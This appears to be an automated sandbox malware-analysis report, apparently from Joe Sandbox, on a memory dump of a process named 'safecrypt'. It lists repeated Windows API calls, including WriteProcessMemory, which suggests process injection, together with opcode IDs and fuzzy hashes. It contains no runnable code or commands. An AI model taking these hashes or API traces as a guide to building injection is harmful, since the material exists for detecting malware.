                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 21d50d2007dd92c12d20a00ee5866e89ac50f0f2d8dfbd3b29654133d477ed28
                    • Instruction ID: 8d363b1c23a8b7d103a1cf7eb7053e47c13bdb26888557362ed48f47ec7a7c21
                    • Opcode Fuzzy Hash: 21d50d2007dd92c12d20a00ee5866e89ac50f0f2d8dfbd3b29654133d477ed28
                    • Instruction Fuzzy Hash: DA115335D282CADAEB2DB7308C41BB97265FB83701F0093CDE10BB9080EE740A43C915
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: MemoryProcessWrite
                    • String ID:
                    • API String ID: 3559483778-0
                    • Opcode ID: 77ef553066695ffda278322379b104e7957bc83d9acadbaf098a8393b9c1341f
                    • Instruction ID: 4e8d35146d2b9d35d9273e63b2499170a911e35684820b0712970038dd087772
                    • Opcode Fuzzy Hash: 77ef553066695ffda278322379b104e7957bc83d9acadbaf098a8393b9c1341f
                    • Instruction Fuzzy Hash: 441148335196169EEB2E73608C59A3E315ABF83B01F445BDDE00B89042DEF80503C9E6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 67c751a8b55108762c3cb0aac3f568bf76068b188bd76126e9ed6258c285c55b
                    • Instruction ID: 747b47131a092775c84e274ac6d7653d3f227efab83b25186b6766073fe9d78c
                    • Opcode Fuzzy Hash: 67c751a8b55108762c3cb0aac3f568bf76068b188bd76126e9ed6258c285c55b
                    • Instruction Fuzzy Hash: 08116635D281C6DEFB2CB3718C01A793296EB43705F00A79DE05BB9180EE7406038916
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 3b93f74d504e587c04ad082dfd367b865e42af04cd8aa33fc555d962d3ba0892
                    • Instruction ID: 267181225f3d88e1128fa5a8f4356c3887d61ad508dbfd7378aedc7494e87530
                    • Opcode Fuzzy Hash: 3b93f74d504e587c04ad082dfd367b865e42af04cd8aa33fc555d962d3ba0892
                    • Instruction Fuzzy Hash: 5E01F721958912FDEF2E77714D11A3D398AAB81709F149F2CE403D6152EE260A0F8866
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 77edb72f7f2b46ae724fd5b6712f3232ce1fcd22015516b3bb3acab835075a87
                    • Instruction ID: 5e2c6b452da04bffb35a3be6bfeaa644cd78906dc542a58b44bbaddfd88a755a
                    • Opcode Fuzzy Hash: 77edb72f7f2b46ae724fd5b6712f3232ce1fcd22015516b3bb3acab835075a87
                    • Instruction Fuzzy Hash: AE017B34D281C2DDFB2CB3719C41A393246FB83306B04A79CE05BB9181EF744603C81A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: a0f65059648f58c3f2ed2e57d5ce79987266beb213469c669ee73b0f4a9396d3
                    • Instruction ID: 4fa053b68cc895589009cc64d8f2a8b889c2920205bb95f2541a9af8f29c6821
                    • Opcode Fuzzy Hash: a0f65059648f58c3f2ed2e57d5ce79987266beb213469c669ee73b0f4a9396d3
                    • Instruction Fuzzy Hash: 4A012D21958452FDFB2B77754E1293D3E8ABB81319F149F1CD003D6152DE26060F8977
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 8f10755c4e3b35cd943f1f14528fd0ec8c7cb9d306b51c701a5feaff7733e221
                    • Instruction ID: 4ce7dd893565755d07992695dd40330d93e5574ff07fda379f135b36397f6d84
                    • Opcode Fuzzy Hash: 8f10755c4e3b35cd943f1f14528fd0ec8c7cb9d306b51c701a5feaff7733e221
                    • Instruction Fuzzy Hash: 60014771D2C2C5DDEB2DB3715C419393A55AB83305B04979DE09BB5182EE3446078616
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 96162bf4c3a3e7afa834e70640d5b40bd64f996c8d8071937c8ec1f1f0623c18
                    • Instruction ID: 976efb1ffa390e56656419014db6d878c258560bc98ec1132c941d73700e53b5
                    • Opcode Fuzzy Hash: 96162bf4c3a3e7afa834e70640d5b40bd64f996c8d8071937c8ec1f1f0623c18
                    • Instruction Fuzzy Hash: 42F02B22958451FDFB2AB7B54E1297D3D8AAB82309B046F2CD003C7143DE15460F48BB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 5e3bdf8b89cadbb13794968bd025617baa750df5bc8ad8990af7e527a6b55562
                    • Instruction ID: 993492d9adbfec9c690d07e91265cf13b049be35ef667d26c6e267bedb1d4bb7
                    • Opcode Fuzzy Hash: 5e3bdf8b89cadbb13794968bd025617baa750df5bc8ad8990af7e527a6b55562
                    • Instruction Fuzzy Hash: E1F05928128542EFEF2A73700D02C393E4AFBD3309B28ABCC900B84942DE264607D45A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: f3230fbf61f6e0d9014828d3481ba37165ae35ba5a217118e601344dbf9f54e3
                    • Instruction ID: 479a523d382bb715a652dcbe8b7822199b3a6d597857a97665c1181caa38b40c
                    • Opcode Fuzzy Hash: f3230fbf61f6e0d9014828d3481ba37165ae35ba5a217118e601344dbf9f54e3
                    • Instruction Fuzzy Hash: 29F02474E28591EDEF2DF7311C41C3D358AAB83B15B109B8CE00BE5181FE3946078816
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: baf21cfd23433194dd69e73abd46c16f2c74aefdaf863e3f807c3351c79a3420
                    • Instruction ID: 51bf60f20bac7b0fbcc6ccc11035f238295ff2b2292564562f91b84c8e604d27
                    • Opcode Fuzzy Hash: baf21cfd23433194dd69e73abd46c16f2c74aefdaf863e3f807c3351c79a3420
                    • Instruction Fuzzy Hash: 33F02762948421BCBF2AB7B54E1267D3D8FAB81309B006F2CD013D7152CE250A0F48BB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: ffe739957d8aee659d93a4557b79e1840c92414a55c47c2ea4f43bc571cfae4e
                    • Instruction ID: bd4fa9d0f8ae03244aa1a0c2dcb969aa13ec633b5bcff4e7bc2539b8cf199c0f
                    • Opcode Fuzzy Hash: ffe739957d8aee659d93a4557b79e1840c92414a55c47c2ea4f43bc571cfae4e
                    • Instruction Fuzzy Hash: FFF02E69D380C2D9EF2DF3725D0147D36466BC3359714978CD04BA01C1EE394607C817
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ChangeCloseFileFindNotificationRead
                    • String ID:
                    • API String ID: 1200561807-0
                    • Opcode ID: afa07cb496a8da912f676ae3c1371ff864dc80503d938838de9e54581c4dde44
                    • Instruction ID: fc495ccc9c9a6947acece0f866fbd471509059118150ccc7e6b0b0eddf5b5d41
                    • Opcode Fuzzy Hash: afa07cb496a8da912f676ae3c1371ff864dc80503d938838de9e54581c4dde44
                    • Instruction Fuzzy Hash: 5BF02219528941EFEF2EB3B11E13C3A3D4EFB83705308ABCC9007C8A43DD6A460B945A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ChangeCloseFileFindNotificationRead
                    • String ID:
                    • API String ID: 1200561807-0
                    • Opcode ID: 8d7be45794c9a5e24aa98d82897472a35a5572ac2451a5782ead3191aff66ef7
                    • Instruction ID: c4b4e0580b8ab49a267d7988a05f0d5091ed0815079dc46e5f7dbb995cf9917f
                    • Opcode Fuzzy Hash: 8d7be45794c9a5e24aa98d82897472a35a5572ac2451a5782ead3191aff66ef7
                    • Instruction Fuzzy Hash: B2E0DF69528940AEAF2AB3B11E1283E3D4FBB83705314ABCD810788542CD6A4A07985A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: d04169a8507aa7b32e6d37faf1dc935d4416816b03ff0f492e5d5591e96265b0
                    • Instruction ID: a870df2d5a8212fe1cfc98cc3d0e43dd2e3daa3fa8d539e29dd78d9e74c5861b
                    • Opcode Fuzzy Hash: d04169a8507aa7b32e6d37faf1dc935d4416816b03ff0f492e5d5591e96265b0
                    • Instruction Fuzzy Hash: 2DE06869E28451D9EB2DF3721C0287E795A6FC3719304678CD007E01C1EE38830B8567
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: e0cf85a97bdfaefc5a75eed83a3704453fe5d3c179af08f2812745ba3dc88536
                    • Instruction ID: 2357febcb9a40acbde02e40a93ad17b03f7be3830384c399535a3ce5d1f1f4e5
                    • Opcode Fuzzy Hash: e0cf85a97bdfaefc5a75eed83a3704453fe5d3c179af08f2812745ba3dc88536
                    • Instruction Fuzzy Hash: 0CE0D8319045656DEF1ABAB48E1227C3A465B50305F105F3CC057971A2CE12460B08A7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileW.KERNELBASE(?,00000000,398A9A0F), ref: 02681114
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: c1e8bde57aee020fc9c60378a3bfaf65363eb9432a64a9b0c489f9f69b63b323
                    • Instruction ID: 037c3d0e586196937e097fe85d47cdedf6411bb0dcd8e57aa3c72dcea3997cd9
                    • Opcode Fuzzy Hash: c1e8bde57aee020fc9c60378a3bfaf65363eb9432a64a9b0c489f9f69b63b323
                    • Instruction Fuzzy Hash: CDE08665E1841199AF2DF3B15D0147E755B6BC3719700678CD057D41C0EE7847074567
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExA.KERNELBASE(00000000), ref: 0268052E
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 1f9d2f406c2fea38e7ed867162859e11e945b7f4c53d93314fe411acd05b36f1
                    • Instruction ID: eaccb762ed46f08995ba1956749575e5fd844b083270d418e8d3d586b1990dfe
                    • Opcode Fuzzy Hash: 1f9d2f406c2fea38e7ed867162859e11e945b7f4c53d93314fe411acd05b36f1
                    • Instruction Fuzzy Hash: 09E026228045646DEB16B7B88E1227C3A069B40304F102F2CC067931A2CE220A0B08A7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 5ce89155a9d0d642553cd5d1d691cc82c29113df743b0b59486fa57b36f6d429
                    • Instruction ID: bd625b7b8710466b253cc15c79c95b44ac83fe69ad7fed13c34e1bb026fd7a87
                    • Opcode Fuzzy Hash: 5ce89155a9d0d642553cd5d1d691cc82c29113df743b0b59486fa57b36f6d429
                    • Instruction Fuzzy Hash: A1D05E76999881582B2DB3B15C3283E288EAAC0B3A301AB0D9423941D5EC680607447B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ChangeCloseFileFindNotificationRead
                    • String ID:
                    • API String ID: 1200561807-0
                    • Opcode ID: 53f2ba922466132cbb0b76afe212b52718d022069b773bc82a210bf8672d787c
                    • Instruction ID: ebef764636a052ae8f452cd9686b422a5734a2c4013ed385d7e5db91ba21fd72
                    • Opcode Fuzzy Hash: 53f2ba922466132cbb0b76afe212b52718d022069b773bc82a210bf8672d787c
                    • Instruction Fuzzy Hash: D7D0A7351696504EDF1EBBB01A5243D3E169B83605314ABDDC117448E3CD2686035805
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 57e0bf374b90b6fcecd768e28653a4ce8691a1f7236897c038de2e8a6dbd967b
                    • Instruction ID: 019d0e60bd039fd1810b5cfeacc61b5fec184303d4693e1fb1fdf3fc9cc04914
                    • Opcode Fuzzy Hash: 57e0bf374b90b6fcecd768e28653a4ce8691a1f7236897c038de2e8a6dbd967b
                    • Instruction Fuzzy Hash: 54D0C9B6A98851A97B2DB3B15D3283E288F6AD171A305AB1D9403C8145ED68060B487B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReadFile.KERNELBASE(?,?,?,?,?), ref: 0268137C
                    • FindCloseChangeNotification.KERNELBASE ref: 02681419
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: ChangeCloseFileFindNotificationRead
                    • String ID:
                    • API String ID: 1200561807-0
                    • Opcode ID: 16d01db0c5107b380cbd906b4d7e195e901270f65508c29fc449c5ea51d449b7
